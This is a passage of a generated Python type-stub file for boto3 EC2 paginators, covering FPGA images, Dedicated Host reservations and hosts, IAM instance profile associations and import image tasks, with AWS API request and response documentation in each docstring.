        - **CreationTime** *(datetime) --* The date and time the flow log was created.
        - **DeliverLogsErrorMessage** *(string) --* Information about the error that occurred. ``Rate limited`` indicates that CloudWatch Logs throttling has been applied for one or more network interfaces, or that you've reached the limit on the number of log groups that you can create. ``Access error`` indicates that the IAM role associated with the flow log does not have sufficient permissions to publish to CloudWatch Logs. ``Unknown error`` indicates an internal error.
        - **DeliverLogsPermissionArn** *(string) --* The ARN of the IAM role that posts logs to CloudWatch Logs.
        - **DeliverLogsStatus** *(string) --* The status of the logs delivery (``SUCCESS`` | ``FAILED`` ).
        - **FlowLogId** *(string) --* The flow log ID.
        - **FlowLogStatus** *(string) --* The status of the flow log (``ACTIVE`` ).
        - **LogGroupName** *(string) --* The name of the flow log group.
        - **ResourceId** *(string) --* The ID of the resource on which the flow log was created.
        - **TrafficType** *(string) --* The type of traffic captured for the flow log (``ACCEPT`` | ``REJECT`` | ``ALL`` ).
        - **LogDestinationType** *(string) --* The type of destination to which the flow log data is published (``cloud-watch-logs`` | ``s3`` ).
        - **LogDestination** *(string) --* The destination to which the flow log data is published. If the flow log publishes to CloudWatch Logs, this element indicates the Amazon Resource Name (ARN) of the CloudWatch Logs log group to which the data is published. If the flow log publishes to Amazon S3, this element indicates the ARN of the Amazon S3 bucket to which the data is published.

        :type DryRun: boolean
        :param DryRun:
          Checks whether you have the required permissions for the action, without actually making the request, and provides an error response. If you have the required permissions, the error response is ``DryRunOperation`` . Otherwise, it is ``UnauthorizedOperation`` .
        :type Filters: list
        :param Filters:
          One or more filters. Each filter is a dict with a **Name** *(string)* and **Values** *(list of strings)*; filter names and values are case-sensitive.
          * ``deliver-log-status`` - The status of the logs delivery (``SUCCESS`` | ``FAILED`` ).
          * ``log-destination-type`` - The type of destination to which the flow log publishes data. Possible destination types include ``cloud-watch-logs`` and ``s3`` .
          * ``flow-log-id`` - The ID of the flow log.
          * ``log-group-name`` - The name of the log group.
          * ``resource-id`` - The ID of the VPC, subnet, or network interface.
          * ``traffic-type`` - The type of traffic (``ACCEPT`` | ``REJECT`` | ``ALL`` ).
        :type FlowLogIds: list
        :param FlowLogIds:
          One or more flow log IDs.
          - *(string) --*
        :type PaginationConfig: dict
        :param PaginationConfig:
          A dictionary that provides parameters to control pagination.
          - **MaxItems** *(integer) --* The total number of items to return. If the total number of items available is more than the value specified in max-items then a ``NextToken`` will be provided in the output that you can use to resume pagination.
          - **PageSize** *(integer) --* The size of each page.
          - **StartingToken** *(string) --* A token to specify where to start paginating. This is the ``NextToken`` from a previous response.
        :rtype: dict
        :returns:
        """
        pass
class DescribeFpgaImages(Paginator):
    """Paginator for :py:meth:`EC2.Client.describe_fpga_images`. Generated stub; the real implementation is provided by botocore at runtime."""
    def paginate(self, DryRun: bool = None, FpgaImageIds: List[str] = None, Owners: List[str] = None, Filters: List[Dict] = None, PaginationConfig: Dict = None) -> Dict:
        """
        Creates an iterator that will paginate through responses from :py:meth:`EC2.Client.describe_fpga_images`.
        See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/ec2-2016-11-15/DescribeFpgaImages>`_
        **Request Syntax**
        ::
        response_iterator = paginator.paginate(
        DryRun=True|False,
        FpgaImageIds=[
        'string',
        ],
        Owners=[
        'string',
        ],
        Filters=[
        {
        'Name': 'string',
        'Values': [
        'string',
        ]
        },
        ],
        PaginationConfig={
        'MaxItems': 123,
        'PageSize': 123,
        'StartingToken': 'string'
        }
        )
        **Response Syntax**
        ::
        {
        'FpgaImages': [
        {
        'FpgaImageId': 'string',
        'FpgaImageGlobalId': 'string',
        'Name': 'string',
        'Description': 'string',
        'ShellVersion': 'string',
        'PciId': {
        'DeviceId': 'string',
        'VendorId': 'string',
        'SubsystemId': 'string',
        'SubsystemVendorId': 'string'
        },
        'State': {
        'Code': 'pending'|'failed'|'available'|'unavailable',
        'Message': 'string'
        },
        'CreateTime': datetime(2015, 1, 1),
        'UpdateTime': datetime(2015, 1, 1),
        'OwnerId': 'string',
        'OwnerAlias': 'string',
        'ProductCodes': [
        {
        'ProductCodeId': 'string',
        'ProductCodeType': 'devpay'|'marketplace'
        },
        ],
        'Tags': [
        {
        'Key': 'string',
        'Value': 'string'
        },
        ],
        'Public': True|False,
        'DataRetentionSupport': True|False
        },
        ],
        }
        **Response Structure**
        - *(dict) --*
        - **FpgaImages** *(list) --*
        Information about the FPGA images.
        - *(dict) --*
        Describes an Amazon FPGA image (AFI).
        - **FpgaImageId** *(string) --*
        The FPGA image identifier (AFI ID).
        - **FpgaImageGlobalId** *(string) --*
        The global FPGA image identifier (AGFI ID).
        - **Name** *(string) --*
        The name of the AFI.
        - **Description** *(string) --*
        The description of the AFI.
        - **ShellVersion** *(string) --*
        The version of the AWS Shell that was used to create the bitstream.
        - **PciId** *(dict) --*
        Information about the PCI bus.
        - **DeviceId** *(string) --*
        The ID of the device.
        - **VendorId** *(string) --*
        The ID of the vendor.
        - **SubsystemId** *(string) --*
        The ID of the subsystem.
        - **SubsystemVendorId** *(string) --*
        The ID of the vendor for the subsystem.
        - **State** *(dict) --*
        Information about the state of the AFI.
        - **Code** *(string) --*
        The state. The following are the possible values:
        * ``pending`` - AFI bitstream generation is in progress.
        * ``available`` - The AFI is available for use.
        * ``failed`` - AFI bitstream generation failed.
        * ``unavailable`` - The AFI is no longer available for use.
        - **Message** *(string) --*
        If the state is ``failed`` , this is the error message.
        - **CreateTime** *(datetime) --*
        The date and time the AFI was created.
        - **UpdateTime** *(datetime) --*
        The time of the most recent update to the AFI.
        - **OwnerId** *(string) --*
        The AWS account ID of the AFI owner.
        - **OwnerAlias** *(string) --*
        The alias of the AFI owner. Possible values include ``self`` , ``amazon`` , and ``aws-marketplace`` .
        - **ProductCodes** *(list) --*
        The product codes for the AFI.
        - *(dict) --*
        Describes a product code.
        - **ProductCodeId** *(string) --*
        The product code.
        - **ProductCodeType** *(string) --*
        The type of product code.
        - **Tags** *(list) --*
        Any tags assigned to the AFI.
        - *(dict) --*
        Describes a tag.
        - **Key** *(string) --*
        The key of the tag.
        Constraints: Tag keys are case-sensitive and accept a maximum of 127 Unicode characters. May not begin with ``aws:`` .
        - **Value** *(string) --*
        The value of the tag.
        Constraints: Tag values are case-sensitive and accept a maximum of 255 Unicode characters.
        - **Public** *(boolean) --*
        Indicates whether the AFI is public.
        - **DataRetentionSupport** *(boolean) --*
        Indicates whether data retention support is enabled for the AFI.
        :type DryRun: boolean
        :param DryRun:
        Checks whether you have the required permissions for the action, without actually making the request, and provides an error response. If you have the required permissions, the error response is ``DryRunOperation`` . Otherwise, it is ``UnauthorizedOperation`` .
        :type FpgaImageIds: list
        :param FpgaImageIds:
        The AFI IDs.
        - *(string) --*
        :type Owners: list
        :param Owners:
        Filters the AFI by owner. Specify an AWS account ID, ``self`` (owner is the sender of the request), or an AWS owner alias (valid values are ``amazon`` | ``aws-marketplace`` ).
        - *(string) --*
        :type Filters: list
        :param Filters:
        The filters.
        * ``create-time`` - The creation time of the AFI.
        * ``fpga-image-id`` - The FPGA image identifier (AFI ID).
        * ``fpga-image-global-id`` - The global FPGA image identifier (AGFI ID).
        * ``name`` - The name of the AFI.
        * ``owner-id`` - The AWS account ID of the AFI owner.
        * ``product-code`` - The product code.
        * ``shell-version`` - The version of the AWS Shell that was used to create the bitstream.
        * ``state`` - The state of the AFI (``pending`` | ``failed`` | ``available`` | ``unavailable`` ).
        * ``tag`` :<key> - The key/value combination of a tag assigned to the resource. Use the tag key in the filter name and the tag value as the filter value. For example, to find all resources that have a tag with the key ``Owner`` and the value ``TeamA`` , specify ``tag:Owner`` for the filter name and ``TeamA`` for the filter value.
        * ``tag-key`` - The key of a tag assigned to the resource. Use this filter to find all resources assigned a tag with a specific key, regardless of the tag value.
        * ``update-time`` - The time of the most recent update.
        - *(dict) --*
        A filter name and value pair that is used to return a more specific list of results from a describe operation. Filters can be used to match a set of resources by specific criteria, such as tags, attributes, or IDs. The filters supported by a describe operation are documented with the describe operation. For example:
        * DescribeAvailabilityZones
        * DescribeImages
        * DescribeInstances
        * DescribeKeyPairs
        * DescribeSecurityGroups
        * DescribeSnapshots
        * DescribeSubnets
        * DescribeTags
        * DescribeVolumes
        * DescribeVpcs
        - **Name** *(string) --*
        The name of the filter. Filter names are case-sensitive.
        - **Values** *(list) --*
        The filter values. Filter values are case-sensitive.
        - *(string) --*
        :type PaginationConfig: dict
        :param PaginationConfig:
        A dictionary that provides parameters to control pagination.
        - **MaxItems** *(integer) --*
        The total number of items to return. If the total number of items available is more than the value specified in max-items then a ``NextToken`` will be provided in the output that you can use to resume pagination.
        - **PageSize** *(integer) --*
        The size of each page.
        - **StartingToken** *(string) --*
        A token to specify where to start paginating. This is the ``NextToken`` from a previous response.
        :rtype: dict
        :returns:
        """
        pass
class DescribeHostReservationOfferings(Paginator):
    """Paginator for :py:meth:`EC2.Client.describe_host_reservation_offerings`. Generated stub; the real implementation is provided by botocore at runtime."""
    def paginate(self, Filters: List[Dict] = None, MaxDuration: int = None, MinDuration: int = None, OfferingId: str = None, PaginationConfig: Dict = None) -> Dict:
        """
        Creates an iterator that will paginate through responses from :py:meth:`EC2.Client.describe_host_reservation_offerings`.
        See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/ec2-2016-11-15/DescribeHostReservationOfferings>`_
        **Request Syntax**
        ::
        response_iterator = paginator.paginate(
        Filters=[
        {
        'Name': 'string',
        'Values': [
        'string',
        ]
        },
        ],
        MaxDuration=123,
        MinDuration=123,
        OfferingId='string',
        PaginationConfig={
        'MaxItems': 123,
        'PageSize': 123,
        'StartingToken': 'string'
        }
        )
        **Response Syntax**
        ::
        {
        'OfferingSet': [
        {
        'CurrencyCode': 'USD',
        'Duration': 123,
        'HourlyPrice': 'string',
        'InstanceFamily': 'string',
        'OfferingId': 'string',
        'PaymentOption': 'AllUpfront'|'PartialUpfront'|'NoUpfront',
        'UpfrontPrice': 'string'
        },
        ]
        }
        **Response Structure**
        - *(dict) --*
        - **OfferingSet** *(list) --*
        Information about the offerings.
        - *(dict) --*
        Details about the Dedicated Host Reservation offering.
        - **CurrencyCode** *(string) --*
        The currency of the offering.
        - **Duration** *(integer) --*
        The duration of the offering (in seconds).
        - **HourlyPrice** *(string) --*
        The hourly price of the offering.
        - **InstanceFamily** *(string) --*
        The instance family of the offering.
        - **OfferingId** *(string) --*
        The ID of the offering.
        - **PaymentOption** *(string) --*
        The available payment option.
        - **UpfrontPrice** *(string) --*
        The upfront price of the offering. Does not apply to No Upfront offerings.
        :type Filters: list
        :param Filters:
        The filters.
        * ``instance-family`` - The instance family of the offering (for example, ``m4`` ).
        * ``payment-option`` - The payment option (``NoUpfront`` | ``PartialUpfront`` | ``AllUpfront`` ).
        - *(dict) --*
        A filter name and value pair that is used to return a more specific list of results from a describe operation. Filters can be used to match a set of resources by specific criteria, such as tags, attributes, or IDs. The filters supported by a describe operation are documented with the describe operation. For example:
        * DescribeAvailabilityZones
        * DescribeImages
        * DescribeInstances
        * DescribeKeyPairs
        * DescribeSecurityGroups
        * DescribeSnapshots
        * DescribeSubnets
        * DescribeTags
        * DescribeVolumes
        * DescribeVpcs
        - **Name** *(string) --*
        The name of the filter. Filter names are case-sensitive.
        - **Values** *(list) --*
        The filter values. Filter values are case-sensitive.
        - *(string) --*
        :type MaxDuration: integer
        :param MaxDuration:
        This is the maximum duration of the reservation to purchase, specified in seconds. Reservations are available in one-year and three-year terms. The number of seconds specified must be the number of seconds in a year (365x24x60x60) times one of the supported durations (1 or 3). For example, specify 94608000 for three years.
        :type MinDuration: integer
        :param MinDuration:
        This is the minimum duration of the reservation you\'d like to purchase, specified in seconds. Reservations are available in one-year and three-year terms. The number of seconds specified must be the number of seconds in a year (365x24x60x60) times one of the supported durations (1 or 3). For example, specify 31536000 for one year.
        :type OfferingId: string
        :param OfferingId:
        The ID of the reservation offering.
        :type PaginationConfig: dict
        :param PaginationConfig:
        A dictionary that provides parameters to control pagination.
        - **MaxItems** *(integer) --*
        The total number of items to return. If the total number of items available is more than the value specified in max-items then a ``NextToken`` will be provided in the output that you can use to resume pagination.
        - **PageSize** *(integer) --*
        The size of each page.
        - **StartingToken** *(string) --*
        A token to specify where to start paginating. This is the ``NextToken`` from a previous response.
        :rtype: dict
        :returns:
        """
        pass
class DescribeHostReservations(Paginator):
    """Paginator for :py:meth:`EC2.Client.describe_host_reservations`. Generated stub; the real implementation is provided by botocore at runtime."""
    def paginate(self, Filters: List[Dict] = None, HostReservationIdSet: List[str] = None, PaginationConfig: Dict = None) -> Dict:
        """
        Creates an iterator that will paginate through responses from :py:meth:`EC2.Client.describe_host_reservations`.
        See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/ec2-2016-11-15/DescribeHostReservations>`_
        **Request Syntax**
        ::
        response_iterator = paginator.paginate(
        Filters=[
        {
        'Name': 'string',
        'Values': [
        'string',
        ]
        },
        ],
        HostReservationIdSet=[
        'string',
        ],
        PaginationConfig={
        'MaxItems': 123,
        'PageSize': 123,
        'StartingToken': 'string'
        }
        )
        **Response Syntax**
        ::
        {
        'HostReservationSet': [
        {
        'Count': 123,
        'CurrencyCode': 'USD',
        'Duration': 123,
        'End': datetime(2015, 1, 1),
        'HostIdSet': [
        'string',
        ],
        'HostReservationId': 'string',
        'HourlyPrice': 'string',
        'InstanceFamily': 'string',
        'OfferingId': 'string',
        'PaymentOption': 'AllUpfront'|'PartialUpfront'|'NoUpfront',
        'Start': datetime(2015, 1, 1),
        'State': 'payment-pending'|'payment-failed'|'active'|'retired',
        'UpfrontPrice': 'string',
        'Tags': [
        {
        'Key': 'string',
        'Value': 'string'
        },
        ]
        },
        ],
        }
        **Response Structure**
        - *(dict) --*
        - **HostReservationSet** *(list) --*
        Details about the reservation's configuration.
        - *(dict) --*
        Details about the Dedicated Host Reservation and associated Dedicated Hosts.
        - **Count** *(integer) --*
        The number of Dedicated Hosts the reservation is associated with.
        - **CurrencyCode** *(string) --*
        The currency in which the ``upfrontPrice`` and ``hourlyPrice`` amounts are specified. At this time, the only supported currency is ``USD`` .
        - **Duration** *(integer) --*
        The length of the reservation's term, specified in seconds. Can be ``31536000 (1 year)`` | ``94608000 (3 years)`` .
        - **End** *(datetime) --*
        The date and time that the reservation ends.
        - **HostIdSet** *(list) --*
        The IDs of the Dedicated Hosts associated with the reservation.
        - *(string) --*
        - **HostReservationId** *(string) --*
        The ID of the reservation that specifies the associated Dedicated Hosts.
        - **HourlyPrice** *(string) --*
        The hourly price of the reservation.
        - **InstanceFamily** *(string) --*
        The instance family of the Dedicated Host Reservation. The instance family on the Dedicated Host must be the same in order for it to benefit from the reservation.
        - **OfferingId** *(string) --*
        The ID of the reservation. This remains the same regardless of which Dedicated Hosts are associated with it.
        - **PaymentOption** *(string) --*
        The payment option selected for this reservation.
        - **Start** *(datetime) --*
        The date and time that the reservation started.
        - **State** *(string) --*
        The state of the reservation.
        - **UpfrontPrice** *(string) --*
        The upfront price of the reservation.
        - **Tags** *(list) --*
        Any tags assigned to the Dedicated Host Reservation.
        - *(dict) --*
        Describes a tag.
        - **Key** *(string) --*
        The key of the tag.
        Constraints: Tag keys are case-sensitive and accept a maximum of 127 Unicode characters. May not begin with ``aws:`` .
        - **Value** *(string) --*
        The value of the tag.
        Constraints: Tag values are case-sensitive and accept a maximum of 255 Unicode characters.
        :type Filters: list
        :param Filters:
        The filters.
        * ``instance-family`` - The instance family (for example, ``m4`` ).
        * ``payment-option`` - The payment option (``NoUpfront`` | ``PartialUpfront`` | ``AllUpfront`` ).
        * ``state`` - The state of the reservation (``payment-pending`` | ``payment-failed`` | ``active`` | ``retired`` ).
        * ``tag`` :<key> - The key/value combination of a tag assigned to the resource. Use the tag key in the filter name and the tag value as the filter value. For example, to find all resources that have a tag with the key ``Owner`` and the value ``TeamA`` , specify ``tag:Owner`` for the filter name and ``TeamA`` for the filter value.
        * ``tag-key`` - The key of a tag assigned to the resource. Use this filter to find all resources assigned a tag with a specific key, regardless of the tag value.
        - *(dict) --*
        A filter name and value pair that is used to return a more specific list of results from a describe operation. Filters can be used to match a set of resources by specific criteria, such as tags, attributes, or IDs. The filters supported by a describe operation are documented with the describe operation. For example:
        * DescribeAvailabilityZones
        * DescribeImages
        * DescribeInstances
        * DescribeKeyPairs
        * DescribeSecurityGroups
        * DescribeSnapshots
        * DescribeSubnets
        * DescribeTags
        * DescribeVolumes
        * DescribeVpcs
        - **Name** *(string) --*
        The name of the filter. Filter names are case-sensitive.
        - **Values** *(list) --*
        The filter values. Filter values are case-sensitive.
        - *(string) --*
        :type HostReservationIdSet: list
        :param HostReservationIdSet:
        The host reservation IDs.
        - *(string) --*
        :type PaginationConfig: dict
        :param PaginationConfig:
        A dictionary that provides parameters to control pagination.
        - **MaxItems** *(integer) --*
        The total number of items to return. If the total number of items available is more than the value specified in max-items then a ``NextToken`` will be provided in the output that you can use to resume pagination.
        - **PageSize** *(integer) --*
        The size of each page.
        - **StartingToken** *(string) --*
        A token to specify where to start paginating. This is the ``NextToken`` from a previous response.
        :rtype: dict
        :returns:
        """
        pass
class DescribeHosts(Paginator):
    """Paginator for :py:meth:`EC2.Client.describe_hosts`. Generated stub; the real implementation is provided by botocore at runtime."""
    def paginate(self, Filters: List[Dict] = None, HostIds: List[str] = None, PaginationConfig: Dict = None) -> Dict:
        """
        Creates an iterator that will paginate through responses from :py:meth:`EC2.Client.describe_hosts`.
        See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/ec2-2016-11-15/DescribeHosts>`_
        **Request Syntax**
        ::
        response_iterator = paginator.paginate(
        Filters=[
        {
        'Name': 'string',
        'Values': [
        'string',
        ]
        },
        ],
        HostIds=[
        'string',
        ],
        PaginationConfig={
        'MaxItems': 123,
        'PageSize': 123,
        'StartingToken': 'string'
        }
        )
        **Response Syntax**
        ::
        {
        'Hosts': [
        {
        'AutoPlacement': 'on'|'off',
        'AvailabilityZone': 'string',
        'AvailableCapacity': {
        'AvailableInstanceCapacity': [
        {
        'AvailableCapacity': 123,
        'InstanceType': 'string',
        'TotalCapacity': 123
        },
        ],
        'AvailableVCpus': 123
        },
        'ClientToken': 'string',
        'HostId': 'string',
        'HostProperties': {
        'Cores': 123,
        'InstanceType': 'string',
        'Sockets': 123,
        'TotalVCpus': 123
        },
        'HostReservationId': 'string',
        'Instances': [
        {
        'InstanceId': 'string',
        'InstanceType': 'string'
        },
        ],
        'State': 'available'|'under-assessment'|'permanent-failure'|'released'|'released-permanent-failure',
        'AllocationTime': datetime(2015, 1, 1),
        'ReleaseTime': datetime(2015, 1, 1),
        'Tags': [
        {
        'Key': 'string',
        'Value': 'string'
        },
        ]
        },
        ],
        }
        **Response Structure**
        - *(dict) --*
        - **Hosts** *(list) --*
        Information about the Dedicated Hosts.
        - *(dict) --*
        Describes the properties of the Dedicated Host.
        - **AutoPlacement** *(string) --*
        Whether auto-placement is on or off.
        - **AvailabilityZone** *(string) --*
        The Availability Zone of the Dedicated Host.
        - **AvailableCapacity** *(dict) --*
        The number of new instances that can be launched onto the Dedicated Host.
        - **AvailableInstanceCapacity** *(list) --*
        The total number of instances supported by the Dedicated Host.
        - *(dict) --*
        Information about the instance type that the Dedicated Host supports.
        - **AvailableCapacity** *(integer) --*
        The number of instances that can still be launched onto the Dedicated Host.
        - **InstanceType** *(string) --*
        The instance type size supported by the Dedicated Host.
        - **TotalCapacity** *(integer) --*
        The total number of instances that can be launched onto the Dedicated Host.
        - **AvailableVCpus** *(integer) --*
        The number of vCPUs available on the Dedicated Host.
        - **ClientToken** *(string) --*
        Unique, case-sensitive identifier that you provide to ensure idempotency of the request. For more information, see `How to Ensure Idempotency <https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/Run_Instance_Idempotency.html>`__ in the *Amazon Elastic Compute Cloud User Guide* .
        - **HostId** *(string) --*
        The ID of the Dedicated Host.
        - **HostProperties** *(dict) --*
        The hardware specifications of the Dedicated Host.
        - **Cores** *(integer) --*
        The number of cores on the Dedicated Host.
        - **InstanceType** *(string) --*
        The instance type size that the Dedicated Host supports (for example, ``m3.medium`` ).
        - **Sockets** *(integer) --*
        The number of sockets on the Dedicated Host.
        - **TotalVCpus** *(integer) --*
        The number of vCPUs on the Dedicated Host.
        - **HostReservationId** *(string) --*
        The reservation ID of the Dedicated Host. This returns a ``null`` response if the Dedicated Host doesn't have an associated reservation.
        - **Instances** *(list) --*
        The IDs and instance type that are currently running on the Dedicated Host.
        - *(dict) --*
        Describes an instance running on a Dedicated Host.
        - **InstanceId** *(string) --*
        The IDs of instances that are running on the Dedicated Host.
        - **InstanceType** *(string) --*
        The instance type size (for example, ``m3.medium`` ) of the running instance.
        - **State** *(string) --*
        The Dedicated Host's state.
        - **AllocationTime** *(datetime) --*
        The time that the Dedicated Host was allocated.
        - **ReleaseTime** *(datetime) --*
        The time that the Dedicated Host was released.
        - **Tags** *(list) --*
        Any tags assigned to the Dedicated Host.
        - *(dict) --*
        Describes a tag.
        - **Key** *(string) --*
        The key of the tag.
        Constraints: Tag keys are case-sensitive and accept a maximum of 127 Unicode characters. May not begin with ``aws:`` .
        - **Value** *(string) --*
        The value of the tag.
        Constraints: Tag values are case-sensitive and accept a maximum of 255 Unicode characters.
        :type Filters: list
        :param Filters:
        The filters.
        * ``auto-placement`` - Whether auto-placement is enabled or disabled (``on`` | ``off`` ).
        * ``availability-zone`` - The Availability Zone of the host.
        * ``client-token`` - The idempotency token that you provided when you allocated the host.
        * ``host-reservation-id`` - The ID of the reservation assigned to this host.
        * ``instance-type`` - The instance type size that the Dedicated Host is configured to support.
        * ``state`` - The allocation state of the Dedicated Host (``available`` | ``under-assessment`` | ``permanent-failure`` | ``released`` | ``released-permanent-failure`` ).
        * ``tag-key`` - The key of a tag assigned to the resource. Use this filter to find all resources assigned a tag with a specific key, regardless of the tag value.
        - *(dict) --*
        A filter name and value pair that is used to return a more specific list of results from a describe operation. Filters can be used to match a set of resources by specific criteria, such as tags, attributes, or IDs. The filters supported by a describe operation are documented with the describe operation. For example:
        * DescribeAvailabilityZones
        * DescribeImages
        * DescribeInstances
        * DescribeKeyPairs
        * DescribeSecurityGroups
        * DescribeSnapshots
        * DescribeSubnets
        * DescribeTags
        * DescribeVolumes
        * DescribeVpcs
        - **Name** *(string) --*
        The name of the filter. Filter names are case-sensitive.
        - **Values** *(list) --*
        The filter values. Filter values are case-sensitive.
        - *(string) --*
        :type HostIds: list
        :param HostIds:
        The IDs of the Dedicated Hosts. The IDs are used for targeted instance launches.
        - *(string) --*
        :type PaginationConfig: dict
        :param PaginationConfig:
        A dictionary that provides parameters to control pagination.
        - **MaxItems** *(integer) --*
        The total number of items to return. If the total number of items available is more than the value specified in max-items then a ``NextToken`` will be provided in the output that you can use to resume pagination.
        - **PageSize** *(integer) --*
        The size of each page.
        - **StartingToken** *(string) --*
        A token to specify where to start paginating. This is the ``NextToken`` from a previous response.
        :rtype: dict
        :returns:
        """
        pass
class DescribeIamInstanceProfileAssociations(Paginator):
    """Paginator for :py:meth:`EC2.Client.describe_iam_instance_profile_associations`. Generated stub; the real implementation is provided by botocore at runtime."""
    def paginate(self, AssociationIds: List[str] = None, Filters: List[Dict] = None, PaginationConfig: Dict = None) -> Dict:
        """
        Creates an iterator that will paginate through responses from :py:meth:`EC2.Client.describe_iam_instance_profile_associations`.
        See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/ec2-2016-11-15/DescribeIamInstanceProfileAssociations>`_
        **Request Syntax**
        ::
        response_iterator = paginator.paginate(
        AssociationIds=[
        'string',
        ],
        Filters=[
        {
        'Name': 'string',
        'Values': [
        'string',
        ]
        },
        ],
        PaginationConfig={
        'MaxItems': 123,
        'PageSize': 123,
        'StartingToken': 'string'
        }
        )
        **Response Syntax**
        ::
        {
        'IamInstanceProfileAssociations': [
        {
        'AssociationId': 'string',
        'InstanceId': 'string',
        'IamInstanceProfile': {
        'Arn': 'string',
        'Id': 'string'
        },
        'State': 'associating'|'associated'|'disassociating'|'disassociated',
        'Timestamp': datetime(2015, 1, 1)
        },
        ],
        }
        **Response Structure**
        - *(dict) --*
        - **IamInstanceProfileAssociations** *(list) --*
        Information about the IAM instance profile associations.
        - *(dict) --*
        Describes an association between an IAM instance profile and an instance.
        - **AssociationId** *(string) --*
        The ID of the association.
        - **InstanceId** *(string) --*
        The ID of the instance.
        - **IamInstanceProfile** *(dict) --*
        The IAM instance profile.
        - **Arn** *(string) --*
        The Amazon Resource Name (ARN) of the instance profile.
        - **Id** *(string) --*
        The ID of the instance profile.
        - **State** *(string) --*
        The state of the association.
        - **Timestamp** *(datetime) --*
        The time the IAM instance profile was associated with the instance.
        :type AssociationIds: list
        :param AssociationIds:
        The IAM instance profile associations.
        - *(string) --*
        :type Filters: list
        :param Filters:
        The filters.
        * ``instance-id`` - The ID of the instance.
        * ``state`` - The state of the association (``associating`` | ``associated`` | ``disassociating`` | ``disassociated`` ).
        - *(dict) --*
        A filter name and value pair that is used to return a more specific list of results from a describe operation. Filters can be used to match a set of resources by specific criteria, such as tags, attributes, or IDs. The filters supported by a describe operation are documented with the describe operation. For example:
        * DescribeAvailabilityZones
        * DescribeImages
        * DescribeInstances
        * DescribeKeyPairs
        * DescribeSecurityGroups
        * DescribeSnapshots
        * DescribeSubnets
        * DescribeTags
        * DescribeVolumes
        * DescribeVpcs
        - **Name** *(string) --*
        The name of the filter. Filter names are case-sensitive.
        - **Values** *(list) --*
        The filter values. Filter values are case-sensitive.
        - *(string) --*
        :type PaginationConfig: dict
        :param PaginationConfig:
        A dictionary that provides parameters to control pagination.
        - **MaxItems** *(integer) --*
        The total number of items to return. If the total number of items available is more than the value specified in max-items then a ``NextToken`` will be provided in the output that you can use to resume pagination.
        - **PageSize** *(integer) --*
        The size of each page.
        - **StartingToken** *(string) --*
        A token to specify where to start paginating. This is the ``NextToken`` from a previous response.
        :rtype: dict
        :returns:
        """
        pass
class DescribeImportImageTasks(Paginator):
    """Paginator for :py:meth:`EC2.Client.describe_import_image_tasks`. Generated stub; the real implementation is provided by botocore at runtime."""
    def paginate(self, DryRun: bool = None, Filters: List[Dict] = None, ImportTaskIds: List[str] = None, PaginationConfig: Dict = None) -> Dict:
        """
        Creates an iterator that will paginate through responses from :py:meth:`EC2.Client.describe_import_image_tasks`.
        See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/ec2-2016-11-15/DescribeImportImageTasks>`_
        **Request Syntax**
        ::
        response_iterator = paginator.paginate(
        DryRun=True|False,
        Filters=[
        {
        'Name': 'string',
        'Values': [
        'string',
        ]
        },
        ],
        ImportTaskIds=[
        'string',
        ],
        PaginationConfig={
        'MaxItems': 123,
        'PageSize': 123,
        'StartingToken': 'string'
        }
        )
        **Response Syntax**
        ::
        {
        'ImportImageTasks': [
        {
        'Architecture': 'string',
        'Description': 'string',
        'Encrypted': True|False,
        'Hypervisor': 'string',
        'ImageId': 'string',
        'ImportTaskId': 'string',
        'KmsKeyId': 'string',
        'LicenseType': 'string',
        'Platform': 'string',
        'Progress': 'string',
        'SnapshotDetails': [
        {
        'Description': 'string',
        'DeviceName': 'string',
        'DiskImageSize': 123.0,
        'Format': 'string',
        'Progress': 'string',
        'SnapshotId': 'string',
        'Status': 'string',
        'StatusMessage': 'string',
        'Url': 'string',
        'UserBucket': {
        'S3Bucket': 'string',
        'S3Key': 'string'
        }
        },
        ],
        'Status': 'string',
        'StatusMessage': 'string'
        },
        ],
        }
        **Response Structure**
        - *(dict) --*
        Contains the output for DescribeImportImageTasks.
        - **ImportImageTasks** *(list) --*
        A list of zero or more import image tasks that are currently active or were completed or canceled in the previous 7 days.
        - *(dict) --*
        Describes an import image task.
        - **Architecture** *(string) --*
        The architecture of the virtual machine.
        Valid values: ``i386`` | ``x86_64``
        - **Description** *(string) --*
        A description of the import task.
        - **Encrypted** *(boolean) --*
        Indicates whether the image is encrypted.
        - **Hypervisor** *(string) --*
        The target hypervisor for the import task.
        Valid values: ``xen``
        - **ImageId** *(string) --*
        The ID of the Amazon Machine Image (AMI) of the imported virtual machine.
        - **ImportTaskId** *(string) --*
        The ID of the import image task.
        - **KmsKeyId** *(string) --*
        The identifier for the AWS Key Management Service (AWS KMS) customer master key (CMK) that was used to create the encrypted image.
        - **LicenseType** *(string) --*
        The license type of the virtual machine.
        - **Platform** *(string) --*
        The description string for the import image task.
        - **Progress** *(string) --*
        The percentage of progress of the import image task.
        - **SnapshotDetails** *(list) --*
        Information about the snapshots.
        - *(dict) --*
        Describes the snapshot created from the imported disk.
        - **Description** *(string) --*
        A description for the snapshot.
        - **DeviceName** *(string) --*
        The block device mapping for the snapshot.
        - **DiskImageSize** *(float) --*
        The size of the disk in the snapshot, in GiB.
        - **Format** *(string) --*
        The format of the disk image from which the snapshot is created.
        - **Progress** *(string) --*
        The percentage of progress for the task.
        - **SnapshotId** *(string) --*
        The snapshot ID of the disk being imported.
        - **Status** *(string) --*
        A brief status of the snapshot creation.
        - **StatusMessage** *(string) --*
        A detailed status message for the snapshot creation.
        - **Url** *(string) --*
        The URL used to access the disk image.
        - **UserBucket** *(dict) --*
        The S3 bucket for the disk image.
        - **S3Bucket** *(string) --*
        The S3 bucket from which the disk image was created.
        - **S3Key** *(string) --*
        The file name of the disk image.
        - **Status** *(string) --*
        A brief status for the import image task.
        - **StatusMessage** *(string) --*
        A descriptive status message for the import image task.
        :type DryRun: boolean
        :param DryRun:
        Checks whether you have the required permissions for the action, without actually making the request, and provides an error response. If you have the required permissions, the error response is ``DryRunOperation`` . Otherwise, it is ``UnauthorizedOperation`` .
        :type Filters: list
        :param Filters:
        Filter tasks using the ``task-state`` filter and one of the following values: active, completed, deleting, deleted.
        - *(dict) --*
